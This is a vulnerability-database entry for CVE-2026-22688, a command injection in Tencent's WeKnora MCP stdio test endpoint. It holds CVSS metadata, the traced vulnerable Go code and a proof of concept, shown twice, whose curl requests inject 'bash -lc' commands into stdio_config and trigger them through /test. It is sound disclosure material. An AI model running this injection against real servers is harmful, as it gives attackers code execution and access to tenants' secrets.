Vulnerability-Lookup

CVE-2026-22688 (GCVE-0-2026-22688)

Vulnerability from cvelistv5 – Published: 2026-01-10 03:41 – Updated: 2026-01-10 03:41

Title

WeKnora has Command Injection in MCP stdio test

Summary

WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, there is a command injection vulnerability that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values. This issue has been patched in version 0.2.5.

Severity ?

10 (Critical)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

CWE

CWE-77 - Improper Neutralization of Special Elements used in a Command ('Command Injection')

Assigner

GitHub_M

References

URL

	Vendor	Product	Version
	Tencent	WeKnora	Affected: < 0.2.5

FKIE_CVE-2026-22688

Vulnerability from fkie_nvd - Published: 2026-01-10 04:16 - Updated: 2026-01-10 04:16

Severity ?

9.9 (Critical) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Summary

References

	URL	Tags
	security-advisories@github.com	https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb
	security-advisories@github.com	https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc

Impacted products

	Vendor	Product	Version

JSON

To clipboard

{
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "WeKnora is an LLM-powered framework designed for deep document understanding and semantic retrieval. Prior to version 0.2.5, there is a command injection vulnerability that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values. This issue has been patched in version 0.2.5."
    }
  ],
  "id": "CVE-2026-22688",
  "lastModified": "2026-01-10T04:16:01.837",
  "metrics": {
    "cvssMetricV31": [
      {
        "cvssData": {
          "attackComplexity": "LOW",
          "attackVector": "NETWORK",
          "availabilityImpact": "HIGH",
          "baseScore": 9.9,
          "baseSeverity": "CRITICAL",
          "confidentialityImpact": "HIGH",
          "integrityImpact": "HIGH",
          "privilegesRequired": "LOW",
          "scope": "CHANGED",
          "userInteraction": "NONE",
          "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
          "version": "3.1"
        },
        "exploitabilityScore": 3.1,
        "impactScore": 6.0,
        "source": "security-advisories@github.com",
        "type": "Secondary"
      }
    ]
  },
  "published": "2026-01-10T04:16:01.837",
  "references": [
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb"
    },
    {
      "source": "security-advisories@github.com",
      "url": "https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc"
    }
  ],
  "sourceIdentifier": "security-advisories@github.com",
  "vulnStatus": "Received",
  "weaknesses": [
    {
      "description": [
        {
          "lang": "en",
          "value": "CWE-77"
        }
      ],
      "source": "security-advisories@github.com",
      "type": "Primary"
    }
  ]
}

GHSA-78H3-63C4-5FQC

Vulnerability from github – Published: 2026-01-09 19:21 – Updated: 2026-01-11 14:53

Summary

WeKnora has Command Injection in MCP stdio test

Details

Vulnerability Description

Vulnerability Overview

This issue is a command injection vulnerability (CWE-78) that allows authenticated users to inject stdio_config.command/args into MCP stdio settings, causing the server to execute subprocesses using these injected values.

The root causes are as follows:

Missing Security Filtering: When transport_type=stdio, there is no validation on stdio_config.command/args, such as allowlisting, enforcing fixed paths/binaries, or blocking dangerous options.
Functional Flaw (Trust Boundary Violation): The command/args stored as "service configuration data" are directly used in the /test execution flow and connected to execution sinks without validation.
Lack of Authorization Control: This functionality effectively allows "process execution on the server" (an administrative operation), yet no administrator-only permission checks are implemented in the code (accessible with Bearer authentication only).

Vulnerable Code

API Route Registration (path where endpoints are created) ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L85-L110 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L371-L390

```go // 认证中间件 r.Use(middleware.Auth(params.TenantService, params.UserService, params.Config))
```
// 添加OpenTelemetry追踪中间件
r.Use(middleware.TracingMiddleware())

// 需要认证的API路由
v1 := r.Group("/api/v1")
{
    RegisterAuthRoutes(v1, params.AuthHandler)
    RegisterTenantRoutes(v1, params.TenantHandler)
    RegisterKnowledgeBaseRoutes(v1, params.KBHandler)
    RegisterKnowledgeTagRoutes(v1, params.TagHandler)
    RegisterKnowledgeRoutes(v1, params.KnowledgeHandler)
    RegisterFAQRoutes(v1, params.FAQHandler)
    RegisterChunkRoutes(v1, params.ChunkHandler)
    RegisterSessionRoutes(v1, params.SessionHandler)
    RegisterChatRoutes(v1, params.SessionHandler)
    RegisterMessageRoutes(v1, params.MessageHandler)
    RegisterModelRoutes(v1, params.ModelHandler)
    RegisterEvaluationRoutes(v1, params.EvaluationHandler)
    RegisterInitializationRoutes(v1, params.InitializationHandler)
    RegisterSystemRoutes(v1, params.SystemHandler)
    RegisterMCPServiceRoutes(v1, params.MCPServiceHandler)
    RegisterWebSearchRoutes(v1, params.WebSearchHandler)
}
```
```

go func RegisterMCPServiceRoutes(r *gin.RouterGroup, handler *handler.MCPServiceHandler) { mcpServices := r.Group("/mcp-services") { // Create MCP service mcpServices.POST("", handler.CreateMCPService) // List MCP services mcpServices.GET("", handler.ListMCPServices) // Get MCP service by ID mcpServices.GET("/:id", handler.GetMCPService) // Update MCP service mcpServices.PUT("/:id", handler.UpdateMCPService) // Delete MCP service mcpServices.DELETE("/:id", handler.DeleteMCPService) // Test MCP service connection mcpServices.POST("/:id/test", handler.TestMCPService) // Get MCP service tools mcpServices.GET("/:id/tools", handler.GetMCPServiceTools) // Get MCP service resources mcpServices.GET("/:id/resources", handler.GetMCPServiceResources) }
User input (JSON) → types.MCPService binding (POST /api/v1/mcp-services) ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L40-L55

```go var service types.MCPService if err := c.ShouldBindJSON(&service); err != nil { logger.Error(ctx, "Failed to parse MCP service request", err) c.Error(errors.NewBadRequestError(err.Error())) return }
```
tenantID := c.GetUint64(types.TenantIDContextKey.String())
if tenantID == 0 {
    logger.Error(ctx, "Tenant ID is empty")
    c.Error(errors.NewBadRequestError("Tenant ID cannot be empty"))
    return
}
service.TenantID = tenantID

if err := h.mcpServiceService.CreateMCPService(ctx, &service); err != nil {
```
```
Taint propagation (storage): The bound service object is stored directly in the database without sanitization. ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/repository/mcp_service.go#L23-L25

go func (r *mcpServiceRepository) Create(ctx context.Context, service *types.MCPService) error { return r.db.WithContext(ctx).Create(service).Error }
Sink execution: /test endpoint loads the service from the database → executes TestMCPService

https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L323-L325 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/service/mcp_service.go#L238-L264

```go logger.Infof(ctx, "Testing MCP service: %s", secutils.SanitizeForLog(serviceID))
```
result, err := h.mcpServiceService.TestMCPService(ctx, tenantID, serviceID)
```
```

```go service, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id) if err != nil { return nil, fmt.Errorf("failed to get MCP service: %w", err) } if service == nil { return nil, fmt.Errorf("MCP service not found") }
```
// Create temporary client for testing
config := &mcp.ClientConfig{
    Service: service,
}

client, err := mcp.NewMCPClient(config)
if err != nil {
    return &types.MCPTestResult{
        Success: false,
        Message: fmt.Sprintf("Failed to create client: %v", err),
    }, nil
}

// Connect
testCtx, cancel := context.WithTimeout(ctx, 30*time.Second)
defer cancel()

if err := client.Connect(testCtx); err != nil {
    return &types.MCPTestResult{
```
```
Ultimate sink (subprocess execution): The command/args values from stdio configuration are directly used in the subprocess execution path. ****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L120-L137 https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L158-L160

```go case types.MCPTransportStdio: if config.Service.StdioConfig == nil { return nil, fmt.Errorf("stdio_config is required for stdio transport") }
```
    // Convert env vars map to []string format (KEY=value)
    envVars := make([]string, 0, len(config.Service.EnvVars))
    for key, value := range config.Service.EnvVars {
        envVars = append(envVars, fmt.Sprintf("%s=%s", key, value))
    }

    // Create stdio client with options
    // NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)
    mcpClient, err = client.NewStdioMCPClientWithOptions(
        config.Service.StdioConfig.Command,
        envVars,
        config.Service.StdioConfig.Args,
    )
```
```

go if err := c.client.Start(ctx); err != nil { return fmt.Errorf("failed to start client: %w", err) }

PoC

PoC Description

Obtain an authentication token.
Create an MCP service with transport_type=stdio, injecting the command to execute into stdio_config.command/args.
Call the /test endpoint to trigger the Connect() → Start() execution flow, confirming command execution on the server via side effects (e.g., file creation).

PoC

Container state verification (pre-exploitation)

bash docker exec -it WeKnora-app /bin/bash cd /tmp/; ls -l
Authenticate via /api/v1/auth/login to obtain a Bearer token for API calls.

```bash API="http://localhost:8080" EMAIL="admin@gmail.com" PASS="admin123"

TOKEN="$(curl -sS -X POST "$API/api/v1/auth/login" \ -H "Content-Type: application/json" \ -d "{\"email\":\"$EMAIL\",\"password\":\"$PASS\"}" | jq -r '.token // empty')"

echo "TOKEN=$TOKEN" ```
POST to /api/v1/mcp-services with transport_type=stdio and stdio_config to define the command and arguments to be executed on the server.

```bash CREATE_RES="$(curl -sS -X POST "$API/api/v1/mcp-services" \ -H "Authorization: Bearer $TOKEN" \ -H "Content-Type: application/json" \ -d '{ "name":"rce", "description":"rce", "enabled":true, "transport_type":"stdio", "stdio_config":{"command":"bash","args":["-lc","id > /tmp/RCE_ok.txt && uname -a >> /tmp/RCE_ok.txt"]}, "env_vars":{} }')"

MCP_ID="$(echo "$CREATE_RES" | jq -r '.data.id // empty')" echo "MCP_ID=$MCP_ID" ```
Invoke /api/v1/mcp-services/{id}/test to trigger Connect(), causing execution of the stdio subprocess.

bash curl -sS -X POST "$API/api/v1/mcp-services/$MCP_ID/test" \ -H "Authorization: Bearer $TOKEN" | jq .
Post-exploitation verification (container state)

bash ls -l

Impact

Remote Code Execution (RCE): Arbitrary command execution enables file creation/modification, execution of additional payloads, and service disruption
Information Disclosure: Sensitive data exfiltration through reading environment variables, configuration files, keys, tokens, and local files
Privilege Escalation/Lateral Movement (Environment-Dependent): Impact may escalate based on container mounts, network policies, and internal service access permissions
Cross-Tenant Boundary Impact: Execution occurs in a shared backend runtime; depending on deployment configuration, impact may extend beyond tenant boundaries (exact scope is uncertain and varies by deployment setup)

Severity ?

9.9 (Critical)


                  
                    CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/Tencent/WeKnora"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.2.5"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-22688"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-77"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-01-09T19:21:22Z",
    "nvd_published_at": "2026-01-10T04:16:01Z",
    "severity": "CRITICAL"
  },
  "details": "### Vulnerability **Description**\n\n---\n\n**Vulnerability Overview**\n\n\nThis issue is a command\u00a0injection vulnerability (CWE-78) that allows authenticated users\u00a0to inject\u00a0stdio_config.command/args\u00a0into\u00a0MCP stdio settings, causing the server to execute\u00a0subprocesses\u00a0using these injected values.\n\nThe root causes are as follows:\n\n- **Missing\u00a0Security Filtering**: When\u00a0transport_type=stdio, there is no\u00a0validation on\u00a0stdio_config.command/args, such as allowlisting, enforcing fixed paths/binaries, or blocking dangerous options.\n- **Functional Flaw (Trust\u00a0Boundary Violation)**: The\u00a0command/args\u00a0stored\u00a0as \"service configuration data\"\u00a0are directly used in the\u00a0/test\u00a0execution flow and\u00a0connected to execution sinks without validation.\n- **Lack\u00a0of Authorization Control**: This functionality effectively allows \"process execution on the server\" (an administrative operation), yet no administrator-only permission checks are\u00a0implemented in the code (accessible with Bearer authentication only).\n\n**Vulnerable Code**\n\n1. **API Route Registration**\u00a0(path where endpoints are created)\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L85-L110\nhttps://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/router/router.go#L371-L390\n    \n    ```go\n     // \u8ba4\u8bc1\u4e2d\u95f4\u4ef6\n    \tr.Use(middleware.Auth(params.TenantService, params.UserService, params.Config))\n    \n    \t// \u6dfb\u52a0OpenTelemetry\u8ffd\u8e2a\u4e2d\u95f4\u4ef6\n    \tr.Use(middleware.TracingMiddleware())\n    \n    \t// \u9700\u8981\u8ba4\u8bc1\u7684API\u8def\u7531\n    \tv1 := r.Group(\"/api/v1\")\n    \t{\n    \t\tRegisterAuthRoutes(v1, params.AuthHandler)\n    \t\tRegisterTenantRoutes(v1, params.TenantHandler)\n    \t\tRegisterKnowledgeBaseRoutes(v1, params.KBHandler)\n    \t\tRegisterKnowledgeTagRoutes(v1, params.TagHandler)\n    \t\tRegisterKnowledgeRoutes(v1, params.KnowledgeHandler)\n    \t\tRegisterFAQRoutes(v1, params.FAQHandler)\n    \t\tRegisterChunkRoutes(v1, params.ChunkHandler)\n    \t\tRegisterSessionRoutes(v1, params.SessionHandler)\n    \t\tRegisterChatRoutes(v1, params.SessionHandler)\n    \t\tRegisterMessageRoutes(v1, params.MessageHandler)\n    \t\tRegisterModelRoutes(v1, params.ModelHandler)\n    \t\tRegisterEvaluationRoutes(v1, params.EvaluationHandler)\n    \t\tRegisterInitializationRoutes(v1, params.InitializationHandler)\n    \t\tRegisterSystemRoutes(v1, params.SystemHandler)\n    \t\tRegisterMCPServiceRoutes(v1, params.MCPServiceHandler)\n    \t\tRegisterWebSearchRoutes(v1, params.WebSearchHandler)\n    \t}\n    ```\n    \n    ```go\n    func RegisterMCPServiceRoutes(r *gin.RouterGroup, handler *handler.MCPServiceHandler) {\n    \tmcpServices := r.Group(\"/mcp-services\")\n    \t{\n    \t\t// Create MCP service\n    \t\tmcpServices.POST(\"\", handler.CreateMCPService)\n    \t\t// List MCP services\n    \t\tmcpServices.GET(\"\", handler.ListMCPServices)\n    \t\t// Get MCP service by ID\n    \t\tmcpServices.GET(\"/:id\", handler.GetMCPService)\n    \t\t// Update MCP service\n    \t\tmcpServices.PUT(\"/:id\", handler.UpdateMCPService)\n    \t\t// Delete MCP service\n    \t\tmcpServices.DELETE(\"/:id\", handler.DeleteMCPService)\n    \t\t// Test MCP service connection\n    \t\tmcpServices.POST(\"/:id/test\", handler.TestMCPService)\n    \t\t// Get MCP service tools\n    \t\tmcpServices.GET(\"/:id/tools\", handler.GetMCPServiceTools)\n    \t\t// Get MCP service resources\n    \t\tmcpServices.GET(\"/:id/resources\", handler.GetMCPServiceResources)\n    \t}\n    ```\n    \n2. **User input (JSON) \u2192 types.MCPService binding**\u00a0(POST /api/v1/mcp-services)\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L40-L55\n    \n    ```go\n    \tvar service types.MCPService\n    \tif err := c.ShouldBindJSON(\u0026service); err != nil {\n    \t\tlogger.Error(ctx, \"Failed to parse MCP service request\", err)\n    \t\tc.Error(errors.NewBadRequestError(err.Error()))\n    \t\treturn\n    \t}\n    \n    \ttenantID := c.GetUint64(types.TenantIDContextKey.String())\n    \tif tenantID == 0 {\n    \t\tlogger.Error(ctx, \"Tenant ID is empty\")\n    \t\tc.Error(errors.NewBadRequestError(\"Tenant ID cannot be empty\"))\n    \t\treturn\n    \t}\n    \tservice.TenantID = tenantID\n    \n    \tif err := h.mcpServiceService.CreateMCPService(ctx, \u0026service); err != nil {\n    ```\n    \n3. **Taint propagation (storage)**: The bound service object is stored\u00a0directly in\u00a0the database without sanitization.\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/repository/mcp_service.go#L23-L25\n    \n    ```go\n    func (r *mcpServiceRepository) Create(ctx context.Context, service *types.MCPService) error {\n    \treturn r.db.WithContext(ctx).Create(service).Error\n    }\n    ```\n    \n4. **Sink execution**:\u00a0/test\u00a0endpoint loads the service from the database \u2192 executes\u00a0TestMCPService\n    \n    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/handler/mcp_service.go#L323-L325\n    https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/application/service/mcp_service.go#L238-L264\n    \n    ```go\n    \tlogger.Infof(ctx, \"Testing MCP service: %s\", secutils.SanitizeForLog(serviceID))\n    \n    \tresult, err := h.mcpServiceService.TestMCPService(ctx, tenantID, serviceID)\n    ```\n    \n    ```go\n    \tservice, err := s.mcpServiceRepo.GetByID(ctx, tenantID, id)\n    \tif err != nil {\n    \t\treturn nil, fmt.Errorf(\"failed to get MCP service: %w\", err)\n    \t}\n    \tif service == nil {\n    \t\treturn nil, fmt.Errorf(\"MCP service not found\")\n    \t}\n    \n    \t// Create temporary client for testing\n    \tconfig := \u0026mcp.ClientConfig{\n    \t\tService: service,\n    \t}\n    \n    \tclient, err := mcp.NewMCPClient(config)\n    \tif err != nil {\n    \t\treturn \u0026types.MCPTestResult{\n    \t\t\tSuccess: false,\n    \t\t\tMessage: fmt.Sprintf(\"Failed to create client: %v\", err),\n    \t\t}, nil\n    \t}\n    \n    \t// Connect\n    \ttestCtx, cancel := context.WithTimeout(ctx, 30*time.Second)\n    \tdefer cancel()\n    \n    \tif err := client.Connect(testCtx); err != nil {\n    \t\treturn \u0026types.MCPTestResult{\n    ```\n    \n5. **Ultimate sink (subprocess execution)**: The\u00a0command/args\u00a0values from stdio configuration are directly used in the subprocess\u00a0execution path.\n****https://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L120-L137\nhttps://github.com/Tencent/WeKnora/blob/6b7558c5592828380939af18240a4cef67a2cbfc/internal/mcp/client.go#L158-L160\n    \n    ```go\n    \tcase types.MCPTransportStdio:\n    \t\tif config.Service.StdioConfig == nil {\n    \t\t\treturn nil, fmt.Errorf(\"stdio_config is required for stdio transport\")\n    \t\t}\n    \n    \t\t// Convert env vars map to []string format (KEY=value)\n    \t\tenvVars := make([]string, 0, len(config.Service.EnvVars))\n    \t\tfor key, value := range config.Service.EnvVars {\n    \t\t\tenvVars = append(envVars, fmt.Sprintf(\"%s=%s\", key, value))\n    \t\t}\n    \n    \t\t// Create stdio client with options\n    \t\t// NewStdioMCPClientWithOptions(command string, env []string, args []string, opts ...transport.StdioOption)\n    \t\tmcpClient, err = client.NewStdioMCPClientWithOptions(\n    \t\t\tconfig.Service.StdioConfig.Command,\n    \t\t\tenvVars,\n    \t\t\tconfig.Service.StdioConfig.Args,\n    \t\t)\n    ```\n    \n    ```go\n    \tif err := c.client.Start(ctx); err != nil {\n    \t\treturn fmt.Errorf(\"failed to start client: %w\", err)\n    \t}\n    ```\n    \n\n### PoC\n\n---\n\n**PoC Description**\n \n- Obtain an\u00a0authentication\u00a0token.\n- Create an\u00a0MCP service\u00a0with\u00a0transport_type=stdio, injecting the command to execute into\u00a0stdio_config.command/args.\n- Call\u00a0the\u00a0/test\u00a0endpoint to trigger the\u00a0Connect()\u00a0\u2192\u00a0Start()\u00a0execution flow, confirming command execution on the server via side effects (e.g., file creation).\n\n**PoC**\n \n- **Container state verification (pre-exploitation)**\n    \n    ```bash\n    docker exec -it WeKnora-app /bin/bash\n    cd /tmp/; ls -l\n    ```\n    \n    \u003cimg width=\"798\" height=\"78\" alt=\"image\" src=\"https://github.com/user-attachments/assets/3e387e39-cd80-4e30-ba23-3db9ff879209\" /\u003e\n    \n- **Authenticate via\u00a0/api/v1/auth/login\u00a0to obtain a Bearer token for API\u00a0calls.**\n    \n    ```bash\n    API=\"http://localhost:8080\"\n    EMAIL=\"admin@gmail.com\"\n    PASS=\"admin123\"\n    \n    TOKEN=\"$(curl -sS -X POST \"$API/api/v1/auth/login\" \\\n      -H \"Content-Type: application/json\" \\\n      -d \"{\\\"email\\\":\\\"$EMAIL\\\",\\\"password\\\":\\\"$PASS\\\"}\" | jq -r \u0027.token // empty\u0027)\"\n      \n    echo \"TOKEN=$TOKEN\"\n    ```\n    \n    \u003cimg width=\"760\" height=\"73\" alt=\"image\" src=\"https://github.com/user-attachments/assets/4e588f20-9371-4dc3-b585-def2cd752497\" /\u003e\n    \n    \u003cimg width=\"1679\" height=\"193\" alt=\"image\" src=\"https://github.com/user-attachments/assets/a372981c-dc4c-40e9-a9af-4d27fd36251a\" /\u003e\n    \n- **POST to\u00a0/api/v1/mcp-services\u00a0with\u00a0transport_type=stdio\u00a0and\u00a0stdio_config\u00a0to\u00a0define the command and arguments to be executed on the server.**\n    \n    ```bash\n    CREATE_RES=\"$(curl -sS -X POST \"$API/api/v1/mcp-services\" \\\n      -H \"Authorization: Bearer $TOKEN\" \\\n      -H \"Content-Type: application/json\" \\\n      -d \u0027{\n        \"name\":\"rce\",\n        \"description\":\"rce\",\n        \"enabled\":true,\n        \"transport_type\":\"stdio\",\n        \"stdio_config\":{\"command\":\"bash\",\"args\":[\"-lc\",\"id \u003e /tmp/RCE_ok.txt \u0026\u0026 uname -a \u003e\u003e /tmp/RCE_ok.txt\"]},\n        \"env_vars\":{}\n      }\u0027)\"\n      \n    MCP_ID=\"$(echo \"$CREATE_RES\" | jq -r \u0027.data.id // empty\u0027)\"\n    echo \"MCP_ID=$MCP_ID\"\n    ```\n    \n    \u003cimg width=\"1296\" height=\"354\" alt=\"image\" src=\"https://github.com/user-attachments/assets/d109dd4e-d051-46e3-bdcc-4d1a181d1635\" /\u003e\n    \n- **Invoke\u00a0/api/v1/mcp-services/{id}/test\u00a0to trigger\u00a0Connect(), causing execution of the stdio subprocess.**\n    \n    ```bash\n    curl -sS -X POST \"$API/api/v1/mcp-services/$MCP_ID/test\" \\\n      -H \"Authorization: Bearer $TOKEN\" | jq .\n    ```\n    \n    \u003cimg width=\"1270\" height=\"217\" alt=\"image\" src=\"https://github.com/user-attachments/assets/2723ef39-f6b8-4478-b60e-5b6a4e667a1e\" /\u003e\n    \n- **Post-exploitation verification (container state)**\n    \n    ```bash\n    ls -l\n    ```\n    \n    \u003cimg width=\"1243\" height=\"221\" alt=\"image\" src=\"https://github.com/user-attachments/assets/5f78f83a-64e2-4a0a-95c4-6832f606fbcd\" /\u003e\n    \n\n### Impact\n\n---\n\n- **Remote\u00a0Code Execution (RCE)**: Arbitrary command execution enables file creation/modification, execution of\u00a0additional payloads, and service disruption\n- **Information Disclosure**: Sensitive data exfiltration through reading environment variables, configuration files, keys, tokens, and local\u00a0files\n- **Privilege\u00a0Escalation/Lateral\u00a0Movement (Environment-Dependent)**: Impact may\u00a0escalate based on container mounts, network policies, and internal service access permissions\n- **Cross-Tenant\u00a0Boundary Impact**: Execution occurs in a\u00a0shared backend runtime; depending on deployment configuration, impact may extend beyond tenant boundaries (**exact scope is uncertain**\u00a0and varies by deployment setup)",
  "id": "GHSA-78h3-63c4-5fqc",
  "modified": "2026-01-11T14:53:28Z",
  "published": "2026-01-09T19:21:22Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/Tencent/WeKnora/security/advisories/GHSA-78h3-63c4-5fqc"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22688"
    },
    {
      "type": "WEB",
      "url": "https://github.com/Tencent/WeKnora/commit/f7900a5e9a18c99d25cec9589ead9e4e59ce04bb"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/Tencent/WeKnora"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "WeKnora has Command\u00a0Injection\u00a0in\u00a0MCP stdio\u00a0test"
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or observed by the user.
Confirmed: The vulnerability has been validated from an analyst's perspective.
Published Proof of Concept: A public proof of concept is available for this vulnerability.
Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
Not confirmed: The user expressed doubt about the validity of the vulnerability.
Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.

Detection rules are retrieved from Rulezet.

Action not permitted

CVE-2026-22688 (GCVE-0-2026-22688)

FKIE_CVE-2026-22688

GHSA-78H3-63C4-5FQC

Vulnerability Description

PoC

Impact

Tags

Sightings

Nomenclature